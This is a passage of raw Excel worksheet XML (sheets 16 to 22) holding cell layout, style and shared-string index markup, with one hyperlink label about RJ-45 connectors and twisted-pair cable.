      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>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16.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="7" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:B30"/>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1:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>5694</v>
      </c>
    </row>
    <row r="2" spans="1:2" ht="15" thickBot="1">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="1:2" ht="72.599999999999994" thickBot="1">
      <c r="B3" s="126" t="s">
        <v>5523</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" thickBot="1">
      <c r="B4" s="126"/>
    </row>
    <row r="5" spans="1:2" ht="15" thickBot="1">
      <c r="B5" s="126" t="s">
        <v>5524</v>
      </c>
    </row>
    <row r="6" spans="1:2" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A6" s="2"/>
      <c r="B6" s="342" t="s">
        <v>5525</v>
      </c>
    </row>
    <row r="7" spans="1:2" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A7" s="2"/>
      <c r="B7" s="342" t="s">
        <v>5526</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="15" thickBot="1">
      <c r="B8" s="126"/>
    </row>
    <row r="9" spans="1:2" ht="15" thickBot="1">
      <c r="B9" s="126"/>
    </row>
    <row r="10" spans="1:2" ht="15" thickBot="1">
      <c r="B10" s="126"/>
    </row>
    <row r="11" spans="1:2" ht="15" thickBot="1">
      <c r="B11" s="126"/>
    </row>
    <row r="12" spans="1:2" ht="15" thickBot="1">
      <c r="B12" s="126"/>
    </row>
    <row r="13" spans="1:2" ht="15" thickBot="1">
      <c r="B13" s="126"/>
    </row>
    <row r="14" spans="1:2" ht="15" thickBot="1">
      <c r="B14" s="126"/>
    </row>
    <row r="15" spans="1:2" ht="15" thickBot="1">
      <c r="B15" s="126"/>
    </row>
    <row r="16" spans="1:2" ht="15" thickBot="1">
      <c r="B16" s="126"/>
    </row>
    <row r="17" spans="2:2" ht="15" thickBot="1">
      <c r="B17" s="126"/>
    </row>
    <row r="18" spans="2:2" ht="15" thickBot="1">
      <c r="B18" s="126"/>
    </row>
    <row r="19" spans="2:2" ht="15" thickBot="1">
      <c r="B19" s="126"/>
    </row>
    <row r="20" spans="2:2" ht="15" thickBot="1">
      <c r="B20" s="126"/>
    </row>
    <row r="21" spans="2:2" ht="15" thickBot="1">
      <c r="B21" s="126"/>
    </row>
    <row r="22" spans="2:2" ht="15" thickBot="1">
      <c r="B22" s="126"/>
    </row>
    <row r="23" spans="2:2" ht="15" thickBot="1">
      <c r="B23" s="126"/>
    </row>
    <row r="24" spans="2:2" ht="15" thickBot="1">
      <c r="B24" s="126"/>
    </row>
    <row r="25" spans="2:2" ht="15" thickBot="1">
      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>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sheetPr>
    <tabColor rgb="FFFFC000"/>
  </sheetPr>
  <dimension ref="A1:B31"/>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2:2">
      <c r="B1" s="13" t="s">
        <v>5494</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="383" t="s">
        <v>5498</v>
      </c>
    </row>
    <row r="4" spans="2:2">
      <c r="B4" s="147"/>
    </row>
    <row r="5" spans="2:2" ht="57.6">
      <c r="B5" s="336" t="s">
        <v>5491</v>
      </c>
    </row>
    <row r="6" spans="2:2">
      <c r="B6"/>
    </row>
    <row r="7" spans="2:2">
      <c r="B7" s="383" t="s">
        <v>5695</v>
      </c>
    </row>
    <row r="8" spans="2:2">
      <c r="B8" s="147"/>
    </row>
    <row r="9" spans="2:2" ht="72">
      <c r="B9" s="336" t="s">
        <v>5496</v>
      </c>
    </row>
    <row r="10" spans="2:2">
      <c r="B10" t="s">
        <v>5497</v>
      </c>
    </row>
    <row r="11" spans="2:2">
      <c r="B11"/>
    </row>
    <row r="12" spans="2:2">
      <c r="B12" s="383" t="s">
        <v>5499</v>
      </c>
    </row>
    <row r="13" spans="2:2">
      <c r="B13" s="147"/>
    </row>
    <row r="14" spans="2:2" ht="72.599999999999994" thickBot="1">
      <c r="B14" s="336" t="s">
        <v>5492</v>
      </c>
    </row>
    <row r="15" spans="2:2" ht="15" thickBot="1">
      <c r="B15" s="126"/>
    </row>
    <row r="16" spans="2:2" ht="15" thickBot="1">
      <c r="B16" s="126"/>
    </row>
    <row r="17" spans="2:2" ht="15" thickBot="1">
      <c r="B17" s="126"/>
    </row>
    <row r="18" spans="2:2" ht="15" thickBot="1">
      <c r="B18" s="126"/>
    </row>
    <row r="19" spans="2:2" ht="15" thickBot="1">
      <c r="B19" s="126"/>
    </row>
    <row r="20" spans="2:2" ht="15" thickBot="1">
      <c r="B20" s="126"/>
    </row>
    <row r="21" spans="2:2" ht="15" thickBot="1">
      <c r="B21" s="126"/>
    </row>
    <row r="22" spans="2:2" ht="15" thickBot="1">
      <c r="B22" s="126"/>
    </row>
    <row r="23" spans="2:2" ht="15" thickBot="1">
      <c r="B23" s="126"/>
    </row>
    <row r="24" spans="2:2" ht="15" thickBot="1">
      <c r="B24" s="126"/>
    </row>
    <row r="25" spans="2:2" ht="15" thickBot="1">
      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>
    </row>
    <row r="31" spans="2:2" ht="15" thickBot="1">
      <c r="B31" s="126"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B1" r:id="rId1"/>
  </hyperlinks>
  <pageMargins left="0.70866141732283472" right="0.31496062992125984" top="0.35433070866141736" bottom="0.35433070866141736" header="0.31496062992125984" footer="0.31496062992125984"/>
  <pageSetup paperSize="9" scale="70" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId2"/>
  <drawing r:id="rId3"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet18.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="5" tint="0.59999389629810485"/>
  </sheetPr>
  <dimension ref="A1:B108"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane ySplit="2" topLeftCell="A64"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1:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>5411</v>
      </c>
    </row>
    <row r="2" spans="1:2">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="1:2" ht="15" thickBot="1">
      <c r="A3" s="2">
        <v>1</v>
      </c>
      <c r="B3" s="442" t="s">
        <v>4989</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" thickBot="1">
      <c r="B4" s="126" t="s">
        <v>5412</v>
      </c>
    </row>
    <row r="5" spans="1:2" ht="15" thickBot="1">
      <c r="B5" s="342" t="s">
        <v>5413</v>
      </c>
    </row>
    <row r="6" spans="1:2" ht="15" thickBot="1">
      <c r="B6" s="342" t="s">
        <v>5419</v>
      </c>
    </row>
    <row r="7" spans="1:2" ht="15" thickBot="1">
      <c r="B7" s="126" t="s">
        <v>5414</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="15" thickBot="1">
      <c r="B8" s="126" t="s">
        <v>5415</v>
      </c>
    </row>
    <row r="9" spans="1:2">
      <c r="B9" s="350"/>
    </row>
    <row r="10" spans="1:2" ht="15" thickBot="1">
      <c r="A10" s="2">
        <v>2</v>
      </c>
      <c r="B10" s="442" t="s">
        <v>5868</v>
      </c>
    </row>
    <row r="11" spans="1:2" ht="15" thickBot="1">
      <c r="B11" s="442" t="s">
        <v>5867</v>
      </c>
    </row>
    <row r="12" spans="1:2" ht="29.4" thickBot="1">
      <c r="B12" s="126" t="s">
        <v>5416</v>
      </c>
    </row>
    <row r="13" spans="1:2">
      <c r="B13" s="350"/>
    </row>
    <row r="14" spans="1:2" ht="15" thickBot="1">
      <c r="A14" s="2">
        <v>3</v>
      </c>
      <c r="B14" s="442" t="s">
        <v>5869</v>
      </c>
    </row>
    <row r="15" spans="1:2" ht="29.4" thickBot="1">
      <c r="B15" s="126" t="s">
        <v>5420</v>
      </c>
    </row>
    <row r="16" spans="1:2">
      <c r="B16" s="350"/>
    </row>
    <row r="17" spans="1:2" ht="15" thickBot="1">
      <c r="A17" s="2">
        <v>4</v>
      </c>
      <c r="B17" s="442" t="s">
        <v>5870</v>
      </c>
    </row>
    <row r="18" spans="1:2" ht="15" thickBot="1">
      <c r="B18" s="126" t="s">
        <v>5417</v>
      </c>
    </row>
    <row r="19" spans="1:2" ht="15" thickBot="1">
      <c r="B19" s="126" t="s">
        <v>5418</v>
      </c>
    </row>
    <row r="20" spans="1:2" ht="15" thickBot="1">
      <c r="B20" s="126" t="s">
        <v>5421</v>
      </c>
    </row>
    <row r="21" spans="1:2" ht="15" thickBot="1">
      <c r="B21" s="126" t="s">
        <v>5422</v>
      </c>
    </row>
    <row r="22" spans="1:2" ht="15" thickBot="1">
      <c r="B22" s="126" t="s">
        <v>5423</v>
      </c>
    </row>
    <row r="23" spans="1:2" ht="43.8" thickBot="1">
      <c r="B23" s="126" t="s">
        <v>5424</v>
      </c>
    </row>
    <row r="24" spans="1:2">
      <c r="B24" s="445" t="s">
        <v>5875</v>
      </c>
    </row>
    <row r="25" spans="1:2" ht="15" thickBot="1">
      <c r="A25" s="2">
        <v>5</v>
      </c>
      <c r="B25" s="442" t="s">
        <v>5871</v>
      </c>
    </row>
    <row r="26" spans="1:2" ht="15" thickBot="1">
      <c r="B26" s="126" t="s">
        <v>5425</v>
      </c>
    </row>
    <row r="27" spans="1:2" ht="29.4" thickBot="1">
      <c r="B27" s="126" t="s">
        <v>5426</v>
      </c>
    </row>
    <row r="28" spans="1:2" ht="58.2" thickBot="1">
      <c r="B28" s="126" t="s">
        <v>5427</v>
      </c>
    </row>
    <row r="29" spans="1:2" ht="15" thickBot="1">
      <c r="B29" s="126" t="s">
        <v>5431</v>
      </c>
    </row>
    <row r="30" spans="1:2" ht="15" thickBot="1">
      <c r="B30" s="126" t="s">
        <v>5428</v>
      </c>
    </row>
    <row r="31" spans="1:2" ht="15" thickBot="1">
      <c r="B31" s="126" t="s">
        <v>5429</v>
      </c>
    </row>
    <row r="32" spans="1:2" ht="29.4" thickBot="1">
      <c r="B32" s="126" t="s">
        <v>5432</v>
      </c>
    </row>
    <row r="33" spans="1:2" ht="15" thickBot="1">
      <c r="B33" s="126" t="s">
        <v>5430</v>
      </c>
    </row>
    <row r="34" spans="1:2" ht="15" thickBot="1">
      <c r="B34" s="126" t="s">
        <v>5433</v>
      </c>
    </row>
    <row r="36" spans="1:2" ht="15" thickBot="1">
      <c r="A36" s="2">
        <v>6</v>
      </c>
      <c r="B36" s="13" t="s">
        <v>5873</v>
      </c>
    </row>
    <row r="37" spans="1:2" ht="15" thickBot="1">
      <c r="B37" s="126" t="s">
        <v>5872</v>
      </c>
    </row>
    <row r="38" spans="1:2" ht="15" thickBot="1">
      <c r="B38" s="126" t="s">
        <v>5434</v>
      </c>
    </row>
    <row r="39" spans="1:2" ht="15" thickBot="1">
      <c r="B39" s="126" t="s">
        <v>5435</v>
      </c>
    </row>
    <row r="41" spans="1:2" ht="15" thickBot="1">
      <c r="A41" s="2">
        <v>7</v>
      </c>
      <c r="B41" s="442" t="s">
        <v>5874</v>
      </c>
    </row>
    <row r="42" spans="1:2" ht="15" thickBot="1">
      <c r="B42" s="126" t="s">
        <v>5436</v>
      </c>
    </row>
    <row r="43" spans="1:2" ht="15" thickBot="1">
      <c r="B43" s="126" t="s">
        <v>5437</v>
      </c>
    </row>
    <row r="44" spans="1:2" ht="29.4" thickBot="1">
      <c r="B44" s="126" t="s">
        <v>5438</v>
      </c>
    </row>
    <row r="48" spans="1:2">
      <c r="B48" s="437"/>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="444"/>
    </row>
    <row r="64" spans="2:2">
      <c r="B64" s="444"/>
    </row>
    <row r="83" spans="2:2">
      <c r="B83" s="444"/>
    </row>
    <row r="89" spans="2:2">
      <c r="B89" s="444"/>
    </row>
    <row r="108" spans="2:2">
      <c r="B108" s="444"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B3" r:id="rId1"/>
    <hyperlink ref="B11" r:id="rId2"/>
    <hyperlink ref="B10" r:id="rId3" display="RJ-45水晶头和双绞线"/>
    <hyperlink ref="B14" r:id="rId4"/>
    <hyperlink ref="B17" r:id="rId5"/>
    <hyperlink ref="B25" r:id="rId6"/>
    <hyperlink ref="B36" r:id="rId7"/>
    <hyperlink ref="B41" r:id="rId8"/>
    <hyperlink ref="B24" r:id="rId9"/>
  </hyperlinks>
  <pageMargins left="0.70866141732283472" right="0.31496062992125984" top="0.35433070866141736" bottom="0.35433070866141736" header="0.31496062992125984" footer="0.31496062992125984"/>
  <pageSetup paperSize="9" scale="70" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId10"/>
  <drawing r:id="rId11"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet19.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FF00B050"/>
  </sheetPr>
  <dimension ref="A1:B30"/>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1:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>5394</v>
      </c>
    </row>
    <row r="2" spans="1:2" ht="15" thickBot="1">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="1:2" ht="15" thickBot="1">
      <c r="A3" s="2">
        <v>1</v>
      </c>
      <c r="B3" s="126" t="s">
        <v>5395</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" thickBot="1">
      <c r="A4" s="2">
        <v>2</v>
      </c>
      <c r="B4" s="126" t="s">
        <v>5396</v>
      </c>
    </row>
    <row r="5" spans="1:2" ht="15" thickBot="1">
      <c r="A5" s="2">
        <v>3</v>
      </c>
      <c r="B5" s="126" t="s">
        <v>5397</v>
      </c>
    </row>
    <row r="6" spans="1:2" ht="15" thickBot="1">
      <c r="A6" s="2">
        <v>4</v>
      </c>
      <c r="B6" s="126" t="s">
        <v>5398</v>
      </c>
    </row>
    <row r="7" spans="1:2" ht="15" thickBot="1">
      <c r="A7" s="2">
        <v>5</v>
      </c>
      <c r="B7" s="126" t="s">
        <v>5399</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="15" thickBot="1">
      <c r="B8" s="342" t="s">
        <v>5400</v>
      </c>
    </row>
    <row r="9" spans="1:2" ht="15" thickBot="1">
      <c r="B9" s="342" t="s">
        <v>5401</v>
      </c>
    </row>
    <row r="10" spans="1:2" ht="15" thickBot="1">
      <c r="B10" s="342" t="s">
        <v>5402</v>
      </c>
    </row>
    <row r="11" spans="1:2" ht="15" thickBot="1">
      <c r="B11" s="342" t="s">
        <v>5403</v>
      </c>
    </row>
    <row r="12" spans="1:2" ht="15" thickBot="1">
      <c r="A12" s="2">
        <v>6</v>
      </c>
      <c r="B12" s="126" t="s">
        <v>5404</v>
      </c>
    </row>
    <row r="13" spans="1:2" ht="15" thickBot="1">
      <c r="B13" s="342" t="s">
        <v>5405</v>
      </c>
    </row>
    <row r="14" spans="1:2" ht="15" thickBot="1">
      <c r="B14" s="342" t="s">
        <v>5406</v>
      </c>
    </row>
    <row r="15" spans="1:2" ht="15" thickBot="1">
      <c r="B15" s="342" t="s">
        <v>5407</v>
      </c>
    </row>
    <row r="16" spans="1:2" ht="15" thickBot="1">
      <c r="B16" s="342" t="s">
        <v>5408</v>
      </c>
    </row>
    <row r="17" spans="1:2" ht="15" thickBot="1">
      <c r="A17" s="2">
        <v>7</v>
      </c>
      <c r="B17" s="349" t="s">
        <v>5439</v>
      </c>
    </row>
    <row r="18" spans="1:2" ht="15" thickBot="1">
      <c r="B18" s="126"/>
    </row>
    <row r="19" spans="1:2" ht="29.4" thickBot="1">
      <c r="B19" s="126" t="s">
        <v>5409</v>
      </c>
    </row>
    <row r="20" spans="1:2" ht="15" thickBot="1">
      <c r="B20" s="126"/>
    </row>
    <row r="21" spans="1:2" ht="15" thickBot="1">
      <c r="B21" s="126"/>
    </row>
    <row r="22" spans="1:2" ht="15" thickBot="1">
      <c r="B22" s="126"/>
    </row>
    <row r="23" spans="1:2" ht="15" thickBot="1">
      <c r="B23" s="126"/>
    </row>
    <row r="24" spans="1:2" ht="15" thickBot="1">
      <c r="B24" s="126"/>
    </row>
    <row r="25" spans="1:2" ht="15" thickBot="1">
      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="1:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="1:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="1:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="1:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="1:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>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20.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="3" tint="-0.499984740745262"/>
  </sheetPr>
  <dimension ref="A1:B32"/>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1:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>5389</v>
      </c>
    </row>
    <row r="2" spans="1:2" ht="15" thickBot="1">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="1:2" ht="29.4" thickBot="1">
      <c r="A3" s="2">
        <v>1</v>
      </c>
      <c r="B3" s="126" t="s">
        <v>5391</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" thickBot="1">
      <c r="A4" s="2">
        <v>2</v>
      </c>
      <c r="B4" s="126" t="s">
        <v>5390</v>
      </c>
    </row>
    <row r="5" spans="1:2" ht="15" thickBot="1">
      <c r="B5" s="349" t="s">
        <v>5440</v>
      </c>
    </row>
    <row r="6" spans="1:2" ht="29.4" thickBot="1">
      <c r="B6" s="343" t="s">
        <v>5441</v>
      </c>
    </row>
    <row r="7" spans="1:2" ht="15" thickBot="1">
      <c r="B7" s="349" t="s">
        <v>5442</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="29.4" thickBot="1">
      <c r="B8" s="343" t="s">
        <v>5443</v>
      </c>
    </row>
    <row r="9" spans="1:2" ht="15" thickBot="1">
      <c r="B9" s="349" t="s">
        <v>5444</v>
      </c>
    </row>
    <row r="10" spans="1:2" ht="29.4" thickBot="1">
      <c r="B10" s="343" t="s">
        <v>5445</v>
      </c>
    </row>
    <row r="11" spans="1:2" ht="15" thickBot="1">
      <c r="B11" s="126"/>
    </row>
    <row r="12" spans="1:2" ht="15" thickBot="1">
      <c r="B12" s="126"/>
    </row>
    <row r="13" spans="1:2" ht="15" thickBot="1">
      <c r="B13" s="126"/>
    </row>
    <row r="14" spans="1:2" ht="15" thickBot="1">
      <c r="B14" s="126"/>
    </row>
    <row r="15" spans="1:2" ht="15" thickBot="1">
      <c r="B15" s="126"/>
    </row>
    <row r="16" spans="1:2" ht="15" thickBot="1">
      <c r="B16" s="126"/>
    </row>
    <row r="17" spans="2:2" ht="15" thickBot="1">
      <c r="B17" s="126"/>
    </row>
    <row r="18" spans="2:2" ht="15" thickBot="1">
      <c r="B18" s="126"/>
    </row>
    <row r="19" spans="2:2" ht="15" thickBot="1">
      <c r="B19" s="126"/>
    </row>
    <row r="20" spans="2:2" ht="15" thickBot="1">
      <c r="B20" s="126"/>
    </row>
    <row r="21" spans="2:2" ht="15" thickBot="1">
      <c r="B21" s="126"/>
    </row>
    <row r="22" spans="2:2" ht="15" thickBot="1">
      <c r="B22" s="126"/>
    </row>
    <row r="23" spans="2:2" ht="15" thickBot="1">
      <c r="B23" s="126"/>
    </row>
    <row r="24" spans="2:2" ht="15" thickBot="1">
      <c r="B24" s="126"/>
    </row>
    <row r="25" spans="2:2" ht="15" thickBot="1">
      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>
    </row>
    <row r="31" spans="2:2" ht="15" thickBot="1">
      <c r="B31" s="126"/>
    </row>
    <row r="32" spans="2:2" ht="15" thickBot="1">
      <c r="B32" s="126"/>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21.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="9" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:B30"/>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147" customWidth="1"/>
    <col min="2" max="2" width="123.77734375" style="1" customWidth="1"/>
    <col min="3" max="3" width="6.44140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" ht="15.6">
      <c r="A1" s="62" t="s">
        <v>5344</v>
      </c>
    </row>
    <row r="2" spans="1:2" ht="15" thickBot="1">
      <c r="B2" s="4"/>
    </row>
    <row r="3" spans="1:2" ht="15" thickBot="1">
      <c r="B3" s="344" t="s">
        <v>5322</v>
      </c>
    </row>
    <row r="4" spans="1:2" ht="15" thickBot="1">
      <c r="B4" s="342" t="s">
        <v>5323</v>
      </c>
    </row>
    <row r="5" spans="1:2" ht="15" thickBot="1">
      <c r="B5" s="342" t="s">
        <v>5324</v>
      </c>
    </row>
    <row r="6" spans="1:2" ht="15" thickBot="1">
      <c r="B6" s="342" t="s">
        <v>5325</v>
      </c>
    </row>
    <row r="7" spans="1:2" ht="15" thickBot="1">
      <c r="B7" s="126"/>
    </row>
    <row r="8" spans="1:2" ht="16.2" thickBot="1">
      <c r="B8" s="351" t="s">
        <v>5328</v>
      </c>
    </row>
    <row r="9" spans="1:2" ht="15" thickBot="1">
      <c r="B9" s="342" t="s">
        <v>5329</v>
      </c>
    </row>
    <row r="10" spans="1:2" ht="15" thickBot="1">
      <c r="B10" s="342" t="s">
        <v>5330</v>
      </c>
    </row>
    <row r="11" spans="1:2" ht="15" thickBot="1">
      <c r="B11" s="342" t="s">
        <v>5331</v>
      </c>
    </row>
    <row r="12" spans="1:2" ht="15" thickBot="1">
      <c r="B12" s="126"/>
    </row>
    <row r="13" spans="1:2" ht="15" thickBot="1">
      <c r="B13" s="352" t="s">
        <v>5345</v>
      </c>
    </row>
    <row r="14" spans="1:2" ht="15" thickBot="1">
      <c r="B14" s="342" t="s">
        <v>5346</v>
      </c>
    </row>
    <row r="15" spans="1:2" ht="15" thickBot="1">
      <c r="B15" s="126"/>
    </row>
    <row r="16" spans="1:2" ht="15" thickBot="1">
      <c r="B16" s="126"/>
    </row>
    <row r="17" spans="2:2" ht="15" thickBot="1">
      <c r="B17" s="126"/>
    </row>
    <row r="18" spans="2:2" ht="15" thickBot="1">
      <c r="B18" s="126"/>
    </row>
    <row r="19" spans="2:2" ht="15" thickBot="1">
      <c r="B19" s="126"/>
    </row>
    <row r="20" spans="2:2" ht="15" thickBot="1">
      <c r="B20" s="126"/>
    </row>
    <row r="21" spans="2:2" ht="15" thickBot="1">
      <c r="B21" s="126"/>
    </row>
    <row r="22" spans="2:2" ht="15" thickBot="1">
      <c r="B22" s="126"/>
    </row>
    <row r="23" spans="2:2" ht="15" thickBot="1">
      <c r="B23" s="126"/>
    </row>
    <row r="24" spans="2:2" ht="15" thickBot="1">
      <c r="B24" s="126"/>
    </row>
    <row r="25" spans="2:2" ht="15" thickBot="1">
      <c r="B25" s="126"/>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="126"/>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="126"/>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="126"/>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="126"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="126"/>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22.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="3" tint="0.39997558519241921"/>
  </sheetPr>
  <dimension ref="A1:D64"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B6" sqref="B6"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="7.33203125" style="2" customWidth="1"/>
    <col min="2" max="2" width="16" style="147" customWidth="1"/>
    <col min="3" max="3" width="22.6640625" style="147" customWidth="1"/>
    <col min="4" max="4" width="47.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="266" t="s">
        <v>5446</v>
      </c>
      <c r="B1" s="353" t="s">
        <v>5447</v>
      </c>
      <c r="C1" s="353" t="s">
        <v>5448</v>
      </c>
      <c r="D1" s="200" t="s">
        <v>5449</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="266">
        <v>1.1000000000000001</v>
      </c>
      <c r="B2" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C2" s="353" t="s">
        <v>5220</v>
      </c>
      <c r="D2" s="200" t="s">
        <v>5231</v>
      </c>
    </row>
    <row r="3" spans="1:4">
      <c r="A3" s="266">
        <v>1.2</v>
      </c>
      <c r="B3" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C3" s="353" t="s">
        <v>5221</v>
      </c>
      <c r="D3" s="200" t="s">
        <v>5232</v>
      </c>
    </row>
    <row r="4" spans="1:4">
      <c r="A4" s="266">
        <v>1.3</v>
      </c>
      <c r="B4" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C4" s="353" t="s">
        <v>5222</v>
      </c>
      <c r="D4" s="200" t="s">
        <v>5233</v>
      </c>
    </row>
    <row r="5" spans="1:4">
      <c r="A5" s="266">
        <v>1.4</v>
      </c>
      <c r="B5" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C5" s="353" t="s">
        <v>5223</v>
      </c>
      <c r="D5" s="200" t="s">
        <v>5234</v>
      </c>
    </row>
    <row r="6" spans="1:4">
      <c r="A6" s="266">
        <v>1.5</v>
      </c>
      <c r="B6" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C6" s="353" t="s">
        <v>5224</v>
      </c>
      <c r="D6" s="200" t="s">
        <v>5235</v>
      </c>
    </row>
    <row r="7" spans="1:4">
      <c r="A7" s="266">
        <v>1.6</v>
      </c>
      <c r="B7" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C7" s="353" t="s">
        <v>5225</v>
      </c>
      <c r="D7" s="200" t="s">
        <v>5236</v>
      </c>
    </row>
    <row r="8" spans="1:4">
      <c r="A8" s="266">
        <v>1.7</v>
      </c>
      <c r="B8" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C8" s="353" t="s">
        <v>5226</v>
      </c>
      <c r="D8" s="200" t="s">
        <v>5237</v>
      </c>
    </row>
    <row r="9" spans="1:4">
      <c r="A9" s="266">
        <v>1.8</v>
      </c>
      <c r="B9" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C9" s="353" t="s">
        <v>5227</v>
      </c>
      <c r="D9" s="200" t="s">
        <v>5238</v>
      </c>
    </row>
    <row r="10" spans="1:4">
      <c r="A10" s="266">
        <v>1.9</v>
      </c>
      <c r="B10" s="353" t="s">
        <v>5209</v>
      </c>
      <c r="C10" s="353" t="s">
        <v>5228</v>
      </c>
      <c r="D10" s="200" t="s">
        <v>5239</v>
      </c>
    </row>
    <row r="11" spans="1:4">
